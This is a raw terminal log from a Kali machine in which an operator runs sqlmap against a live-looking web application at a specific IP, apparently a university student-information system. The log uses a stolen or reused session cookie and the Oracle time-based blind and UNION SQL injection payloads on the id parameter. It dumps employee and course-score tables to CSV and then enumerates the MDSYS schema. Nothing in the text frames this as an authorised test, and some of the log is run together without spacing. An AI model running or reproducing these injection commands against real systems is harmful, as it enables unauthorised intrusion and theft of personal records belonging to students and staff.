| EMPLOYEEID             | DUTY | EMAIL | DEGREE | GENDER | BORNDATE | EMPLOYEENO | CONTACTINFO | CULTURELEVEL | EMPLOYEENAME | EMPLOYEEPHOTO | DEPARTMENTCODE | EMPLOYEENAME_EN | EMPLOYEETYPECODE |
+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+
| 06103010060710294427A | NULL | NULL  | ??     | NULL     | 200309118  | NULL        | NULL         | ???          | NULL          | 08             | NULL            | NULL             |
+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+

[10:52:03] [INFO] table 'XDGSNEW.BASE_EMPLOYEE160920' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/XDGSNEW/BASE_EMPLOYEE160920.csv'
[10:52:03] [INFO] fetching columns for table 'ST_COURSESCORE_140625QXK' in database 'XDGSNEW'
[10:52:03] [INFO] the SQL query used returns 27 entries
[10:52:04] [INFO] retrieved: "CREDITHOURNUM","NUMBER"
[10:52:04] [INFO] retrieved: "TEACHCLASSID","VARCHAR2"
[10:52:04] [INFO] retrieved: "EMPLOYEEID","VARCHAR2"
[10:52:05] [INFO] retrieved: "REMARK","VARCHAR2"
[10:52:05] [INFO] retrieved: "COURSENO","VARCHAR2"
[10:52:05] [INFO] retrieved: "COURSENAME","VARCHAR2"
[10:52:06] [INFO] retrieved: "COURSEDEPARTMENT","VARCHAR2"
[10:52:06] [INFO] retrieved: "STUDENTID","VARCHAR2"
[10:52:06] [INFO] retrieved: "COURSEID","VARCHAR2"
[10:52:07] [INFO] retrieved: "STUDYTIMES","NUMBER"
[10:52:07] [INFO] retrieved: "TERMID","VARCHAR2"
[10:52:07] [INFO] retrieved: "ISDEGREECOURSE","VARCHAR2"
[10:52:08] [INFO] retrieved: "SCORETYPEID","VARCHAR2"
[10:52:08] [INFO] retrieved: "DAILYSCORE","NUMBER"
[10:52:08] [INFO] retrieved: "EXAMSCORE","VARCHAR2"
[10:52:08] [INFO] retrieved: "SCORE100","NUMBER"
[10:52:09] [INFO] retrieved: "SCOREREMARK","VARCHAR2"
[10:52:09] [INFO] retrieved: "ACCOUNT","NUMBER"
[10:52:09] [INFO] retrieved: "GRADESTATUS","VARCHAR2"
[10:52:10] [INFO] retrieved: "INPUTACCOUNT","VARCHAR2"
[10:52:10] [INFO] retrieved: "INPUTDATE","DATE"
[10:52:10] [INFO] retrieved: "AUDITACCOUNT","VARCHAR2"
[10:52:10] [INFO] retrieved: "AUDITDATE","DATE"
[10:52:11] [INFO] retrieved: "LASTMODIFYDATE","DATE"
[10:52:11] [INFO] retrieved: "LASTMODIFYACCOUNT","VARCHAR2"
[10:52:11] [INFO] retrieved: "MODIFYHISTORY","VARCHAR2"
[10:52:12] [INFO] retrieved: "VOLUMENO","NUMBER"
[10:52:12] [INFO] fetching entries for table 'ST_COURSESCORE_140625QXK' in database 'XDGSNEW'                                                        
[10:52:12] [INFO] fetching number of entries for table 'ST_COURSESCORE_140625QXK' in database 'XDGSNEW'
[10:52:12] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
111972
[10:53:36] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
2
[10:54:10] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
 
                                                                                                                          [10:54:59] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
06122122055410296204
[11:00:34] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
????
[11:12:34] [ERROR] invalid character detected. retrying..
??
[11:16:21] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                
LS0
[11:18:25] [ERROR] invalid character detected. retrying..
[11:19:38] [ERROR] invalid character detected. retrying..
[11:20:02] [ERROR] invalid character detected. retrying..
[11:20:27] [ERROR] invalid character detected. retrying..
[11:20:49] [ERROR] invalid character detected. retrying..
0224e[11:23:06][WARNING](case)timebasedcomparisonrequireslargerstatisticalmodel,pleasewait..............................(done)2[11:23:47][WARNING](case)timebasedcomparisonrequireslargerstatisticalmodel,pleasewait..............................(done)0[11:24:40][WARNING](case)timebasedcomparisonrequireslargerstatisticalmodel,pleasewait..............................(done)[11:25:24][WARNING](case)timebasedcomparisonrequireslargerstatisticalmodel,pleasewait..............................(done)92[11:26:23][WARNING](case)timebasedcomparisonrequireslargerstatisticalmodel,pleasewait..............................(done)?[11:31:16][ERROR]invalidcharacterdetected.retrying..[11:31:48][ERROR]invalidcharacterdetected.retrying..[11:32:23][ERROR]invalidcharacterdetected.retrying..?[11:33:02][WARNING](case)timebasedcomparisonrequireslargerstatisticalmodel,pleasewait..............................(done)a00[11:34:32][ERROR]invalidcharacterdetected.retrying..[11:34:46][ERROR]invalidcharacterdetected.retrying..1[11:35:00][WARNING](case)timebasedcomparisonrequireslargerstatisticalmodel,pleasewait..............................(done)[11:36:01][ERROR]invalidcharacterdetected.retrying..22DC[11:37:31][WARNING]Ctrl+CdetectedindumpingphaseDatabase:XDGSNEWTable:STCOURSESCORE140625QXK[1entry]+++++++++++++++|COURSEID|EMPLOYEEID|ACCOUNT|COURSENO|AUDITDATE|INPUTDATE|EXAMSCORE|DAILYSCORE|COURSENAME|GRADESTATUS|AUDITACCOUNT|INPUTACCOUNT|CREDITHOURNUM|COURSEDEPARTMENT|+++++++++++++++|06122122055410296204|<blank>|2|LS00224e | NULL      | 92        | 0          | ??????     | ??          | NULL         | a001         | 2             | NULL             |
+----------------------+------------+---------+-----------+-----------+-----------+-----------+------------+------------+-------------+--------------+--------------+---------------+------------------+

[11:37:31] [INFO] table 'XDGSNEW.ST_COURSESCORE_140625QXK' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/XDGSNEW/ST_COURSESCORE_140625QXK.csv'
[11:37:31] [INFO] fetching columns for table 'SYS_USERROLE_BAK' in database 'XDGSNEW'
[11:37:32] [INFO] the SQL query used returns 2 entries
[11:37:32] [INFO] retrieved: "ROLECODE","VARCHAR2"
[11:37:32] [INFO] retrieved: "USERACCOUNT","VARCHAR2"
[11:37:32] [INFO] fetching entries for table 'SYS_USERROLE_BAK' in database 'XDGSNEW'                                                                
[11:37:32] [INFO] fetching number of entries for table 'SYS_USERROLE_BAK' in database 'XDGSNEW'
[11:37:32] [WARNING] (case) time-based comparison requires larger statistical model, please wait........^C                                           

[11:37:35] [ERROR] user aborted

[*] shutting down at 11:37:35

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:40:36

[11:40:39] [INFO] resuming back-end DBMS 'oracle'
[11:40:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:40:39] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:40:39] [INFO] fetching tables for database: 'MDSYS'
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[11:40:50] [INFO] the SQL query used returns 18 entries
[11:40:50] [INFO] retrieved: CS_SRS
[11:40:50] [INFO] retrieved: MDRELATE [11:40:50] [INFO] retrieved: OGIS_GEOMETRY_COLUMNS [11:40:50] [INFO] retrieved: OGIS_SPATIAL_REFERENCE_SYSTEMS [11:40:51] [INFO] retrieved: SDO_ANGLE_UNITS [11:40:51] [INFO] retrieved: SDO_AREA_UNITS [11:40:51] [INFO] retrieved: SDO_DATUMS [11:40:51] [INFO] retrieved: SDO_DIST_UNITS [11:40:51] [INFO] retrieved: SDO_ELLIPSOIDS [11:40:51] [INFO] retrieved: SDO_GEOM_METADATA_TABLE [11:40:51] [INFO] retrieved: SDO_INDEX_METADATA_TABLE [11:40:51] [INFO] retrieved: SDO_LRS_METADATA_TABLE [11:40:51] [INFO] retrieved: SDO_MAPS_TABLE [11:40:51] [INFO] retrieved: SDO_PROJECTIONS [11:40:51] [INFO] retrieved: SDO_STYLES_TABLE [11:40:51] [INFO] retrieved: SDO_THEMES_TABLE [11:40:51] [INFO] retrieved: USER_CS_SRS [11:40:51] [INFO] retrieved: USER_TRANSFORM_MAP [11:40:51] [INFO] fetching columns for table 'SDO_MAPS_TABLE' in database 'MDSYS'                                                                     [11:40:52] [INFO] the SQL query used returns 4 entries [11:40:52] [INFO] retrieved: "SDO_OWNER","VARCHAR2" [11:40:52] [INFO] retrieved: "NAME","VARCHAR2" [11:40:52] [INFO] retrieved: "DESCRIPTION","VARCHAR2" [11:40:53] [INFO] retrieved: "DEFINITION","CLOB" [11:40:53] [INFO] fetching entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'                                                                     [11:40:53] [INFO] fetching number of entries for table 'SDO_MAPS_TABLE' in database 'MDSYS' [11:40:53] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                 [11:41:02] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions   0 [11:41:27] [WARNING] table 'SDO_MAPS_TABLE' in database 'MDSYS' appears to be empty Database: MDSYS Table: SDO_MAPS_TABLE [0 entries] +------+-----------+------------+-------------+ | NAME | SDO_OWNER | DEFINITION | DESCRIPTION | +------+-----------+------------+-------------+ +------+-----------+------------+-------------+  [11:41:27] [INFO] table 'MDSYS.SDO_MAPS_TABLE' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv' [11:41:27] [INFO] fetching columns for table 'CS_SRS' in database 'MDSYS' [11:41:27] [INFO] the SQL query used returns 6 entries [11:41:28] [INFO] retrieved: "CS_NAME","VARCHAR2" [11:41:28] [INFO] retrieved: "SRID","NUMBER" [11:41:28] [INFO] retrieved: "AUTH_SRID","NUMBER" [11:41:28] [INFO] retrieved: "AUTH_NAME","VARCHAR2" [11:41:29] [INFO] retrieved: "WKTEXT","VARCHAR2" [11:41:29] [INFO] retrieved: "CS_BOUNDS","SDO_GEOMETRY" [11:41:29] [INFO] fetching entries for table 'CS_SRS' in database 'MDSYS'                                                                             [11:41:29] [INFO] the SQL query used returns 1000 entries ^C [11:43:30] [WARNING] user aborted during enumeration. sqlmap will display partial output [11:43:30] [INFO] fetching number of entries for table 'CS_SRS' in database 'MDSYS' [11:43:30] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                 ^C  [11:43:41] [ERROR] user aborted  [*] shutting down at 11:43:41  root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -T SDO_MAPS_TABLE         ___        __H__  ___ ___["]_____ ___ ___  {1.1.12#stable} |_ -| . ["]     | .'| . | |___|_  [.]_|_|_|__,|  _|       |_|V          |_|   http://sqlmap.org  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program  [*] starting at 11:44:17  [11:44:19] [INFO] resuming back-end DBMS 'oracle'  [11:44:19] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)     Type: AND/OR time-based blind     Title: Oracle AND time-based blind     Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF      Type: UNION query     Title: Generic UNION query (NULL) - 80 columns     Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq --- [11:44:19] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [11:44:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'  [*] shutting down at 11:44:19  root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -C clo         ___        __H__  ___ ___[,]_____ ___ ___  {1.1.12#stable} |_ -| . [(]     | .'| . | |___|_  [,]_|_|_|__,|  _|       |_|V          |_|   http://sqlmap.org  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program  [*] starting at 11:44:53  [11:44:53] [INFO] resuming back-end DBMS 'oracle'  [11:44:53] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)     Type: AND/OR time-based blind     Title: Oracle AND time-based blind     Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF      Type: UNION query     Title: Generic UNION query (NULL) - 80 columns     Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq --- [11:44:54] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [11:44:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'  [*] shutting down at 11:44:54  root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -C name         ___        __H__  ___ ___[.]_____ ___ ___  {1.1.12#stable} |_ -| . [)]     | .'| . | |___|_  ["]_|_|_|__,|  _|       |_|V          |_|   http://sqlmap.org  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program  [*] starting at 11:45:05  [11:45:05] [INFO] resuming back-end DBMS 'oracle'  [11:45:05] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)     Type: AND/OR time-based blind     Title: Oracle AND time-based blind     Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF      Type: UNION query     Title: Generic UNION query (NULL) - 80 columns     Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq --- [11:45:06] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [11:45:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'  [*] shutting down at 11:45:06  root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump         ___        __H__  ___ ___["]_____ ___ ___  {1.1.12#stable} |_ -| . ["]     | .'| . | |___|_  [']_|_|_|__,|  _|       |_|V          |_|   http://sqlmap.org  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program  [*] starting at 11:45:23  [11:45:24] [INFO] resuming back-end DBMS 'oracle'  [11:45:24] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET)     Type: AND/OR time-based blind     Title: Oracle AND time-based blind     Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF      Type: UNION query     Title: Generic UNION query (NULL) - 80 columns     Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq --- [11:45:24] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [11:45:24] [INFO] fetching tables for database: 'MDSYS' [11:45:24] [INFO] the SQL query used returns 18 entries [11:45:24] [INFO] resumed: CS_SRS [11:45:24] [INFO] resumed: MDRELATE
[11:45:24] [INFO] resumed: OGIS_GEOMETRY_COLUMNS
[11:45:24] [INFO] resumed: OGIS_SPATIAL_REFERENCE_SYSTEMS
[11:45:24] [INFO] resumed: SDO_ANGLE_UNITS
[11:45:24] [INFO] resumed: SDO_AREA_UNITS
[11:45:24] [INFO] resumed: SDO_DATUMS
[11:45:24] [INFO] resumed: SDO_DIST_UNITS
[11:45:24] [INFO] resumed: SDO_ELLIPSOIDS
[11:45:24] [INFO] resumed: SDO_GEOM_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_INDEX_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_LRS_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_MAPS_TABLE
[11:45:24] [INFO] resumed: SDO_PROJECTIONS
[11:45:24] [INFO] resumed: SDO_STYLES_TABLE
[11:45:24] [INFO] resumed: SDO_THEMES_TABLE
[11:45:24] [INFO] resumed: USER_CS_SRS
[11:45:24] [INFO] resumed: USER_TRANSFORM_MAP
[11:45:24] [INFO] fetching columns for table 'SDO_MAPS_TABLE' in database 'MDSYS'                                                                    
[11:45:24] [INFO] the SQL query used returns 4 entries
[11:45:24] [INFO] resumed: "SDO_OWNER","VARCHAR2"
[11:45:24] [INFO] resumed: "NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "DESCRIPTION","VARCHAR2"
[11:45:24] [INFO] resumed: "DEFINITION","CLOB"
[11:45:24] [INFO] fetching entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'                                                                    
[11:45:24] [INFO] fetching number of entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:24] [INFO] resumed: 0
[11:45:24] [WARNING] table 'SDO_MAPS_TABLE' in database 'MDSYS' appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+

[11:45:24] [INFO] table 'MDSYS.SDO_MAPS_TABLE' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv'
[11:45:24] [INFO] fetching columns for table 'CS_SRS' in database 'MDSYS'
[11:45:24] [INFO] the SQL query used returns 6 entries
[11:45:24] [INFO] resumed: "CS_NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "SRID","NUMBER"
[11:45:24] [INFO] resumed: "AUTH_SRID","NUMBER"
[11:45:24] [INFO] resumed: "AUTH_NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "WKTEXT","VARCHAR2"
[11:45:24] [INFO] resumed: "CS_BOUNDS","SDO_GEOMETRY"
[11:45:24] [INFO] fetching entries for table 'CS_SRS' in database 'MDSYS'                                                                            
[11:45:24] [INFO] the SQL query used returns 1000 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
^C
[11:45:40] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:45:40] [INFO] fetching number of entries for table 'CS_SRS' in database 'MDSYS'
[11:45:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait.....^C                                              

[11:45:42] [ERROR] user aborted

[*] shutting down at 11:45:42

root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:45:46

[11:45:47] [INFO] resuming back-end DBMS 'oracle'
[11:45:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF

    Type: UNION query
    Title: Generic UNION query (NULL) - 80 columns
    Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:45:47] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:45:47] [INFO] fetching tables for database: 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 18 entries
[11:45:47] [INFO] resumed: CS_SRS
[11:45:47] [INFO] resumed: MD$RELATE
[11:45:47] [INFO] resumed: OGIS_GEOMETRY_COLUMNS
[11:45:47] [INFO] resumed: OGIS_SPATIAL_REFERENCE_SYSTEMS
[11:45:47] [INFO] resumed: SDO_ANGLE_UNITS
[11:45:47] [INFO] resumed: SDO_AREA_UNITS
[11:45:47] [INFO] resumed: SDO_DATUMS
[11:45:47] [INFO] resumed: SDO_DIST_UNITS
[11:45:47] [INFO] resumed: SDO_ELLIPSOIDS
[11:45:47] [INFO] resumed: SDO_GEOM_METADATA_TABLE
[11:45:47] [INFO] resumed: SDO_INDEX_METADATA_TABLE
